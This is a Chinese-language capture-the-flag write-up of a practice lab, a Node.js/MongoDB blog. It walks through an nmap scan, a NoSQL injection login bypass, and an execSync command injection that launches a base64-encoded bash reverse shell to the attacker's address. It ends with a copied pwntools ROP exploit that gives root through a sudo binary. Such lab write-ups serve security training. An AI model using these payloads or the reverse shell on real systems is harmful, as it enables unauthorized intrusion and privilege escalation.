端口扫描

sudo nmap --min-rate 10000 -p- 10.10.236.185 -A                            
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 07:06 UTC
Nmap scan report for 10.10.236.185
Host is up (0.33s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f9:31:1f:9f:b4:a1:10:9d:a9:69:ec:d5:97:df:1a:34 (RSA)
| 256 e9:f5:b9:9e:39:33:00:d2:7f:cf:75:0f:7a:6d:1c:d3 (ECDSA)
|_ 256 44:f2:51:7f:de:78:94:b2:75:2b:a8:fe:25:18:51:49 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Dave's Blog
| http-robots.txt: 1 disallowed entry
|_/admin
3000/tcp open http Node.js (Express middleware)
| http-robots.txt: 1 disallowed entry
|_/admin
|_http-title: Dave's Blog
8989/tcp closed sunwebadmins
Aggressive OS guesses: HP P2000 G3 NAS device (89%), Linux 2.6.32 (88%), Linux 2.6.32 - 3.1 (88%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (88%), Linux 3.7 (88%), Linux 5.0 (88%), Linux 5.0 - 5.4 (88%), Linux 5.1 (88%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (88%), Linux 2.6.32 - 3.13 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8989/tcp)
HOP RTT ADDRESS
1 329.73 ms 10.11.0.1
2 329.91 ms 10.10.236.185

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.61 seconds

Web

发现是开了两个web端口,访问,呈现的看上去两个端口开放的是同一个网站。目录爆破有一个admin,但是输入一些登录并没有任何response,非常奇怪。

房间提示是nosql,第一次遇到,稍微去了解了一下。右键查看源代码,发现有一个js脚本。大概意思是用json格式post提交用户名和密码

改成json格式上传。

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection#tools

有许多nosql的payload,选用

{"username": {"$ne": null}, "password": {"$ne": null}}

查找数据库中用户名和密码为非空的集合

然后在response中得到jwt令牌,在cyberchef里面可以解码

{
"isAdmin": true,
"_id": "5ec6e5cf1dc4d364bf864107",
"username": "dave",
"password": "THM{SuperSecureAdminPassword123}",
"__v": 0,
"iat": 1701417856
}

用得到的用户和密码登录

Getshell

来到一个命令执行的地方,当输入7*7,返回了49,说明确实可以执行命令,但是鉴于对express框架的不了解,去搜索了一下express RCE的方式

require('child_process').execSync('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMS4zOC4yNDUvMTIzNCAwPiYx | base64 -d | bash').toString();

echo后面的内容是一个反弹shell的base64编码后的结果

bash -i >& /dev/tcp/10.11.38.245/1234 0>&1
export TERM=xterm-color

python3 -c "import pty;pty.spawn('/bin/bash')"

改善一下交互性

发现家目录中有一个root身份执行的脚本,并且对所有用户可读可写可执行用于

提示让我们深入mongodb数据库,这个网站应该是用nodejs和mongodb搭建的

输入mongo就可以进入mongodb的命令行,在whatcouldthisbes表中找到第三个flag

db.whatcouldthisbes.find()

提权

sudo -l

发现可以执行一个uid_checker的二进制程序,打算放到IDA中反编译一下

并在main函数中找到第四个flag

除此之外,还存在一个/bin/sh的后门函数,也许是PWN中的ret2text

但是好像涉及到rop链什么的,还没学也暂时不打算学,抄个别人的exp

from pwn import cyclic
from pwnlib.tubes.ssh import ssh
from pwnlib.util.packing import p64

offset = 88 # Found with ropstar

payload = cyclic(offset)
payload += p64(0x400803) # pop r15; ret
payload += p64(0x601060) # .bss
payload += p64(0x4005b0) # gets()
payload += p64(0x400803) # pop r15; ret
payload += p64(0x601060) # .bss
payload += p64(0x400570) # system()

s = ssh(host='', user='dave', keyfile='./key')

p = s.process(['sudo', '/uid_checker'])
print(p.recv())
p.sendline(payload)
print(p.recv())
p.sendline("/bin/sh")
p.interactive(prompt='')

在运行脚本之前需要取消对dave的远程连接认证

ssh-keygen

生成密钥

cp id_rsa.pub authorized_keys

复制一份id_rsa至本地

碎碎念

在这个房间碰到了好多非常陌生的东西,nodejs,express,mongodb。最后的利用也是比较难的吧。找时间再具体了解一下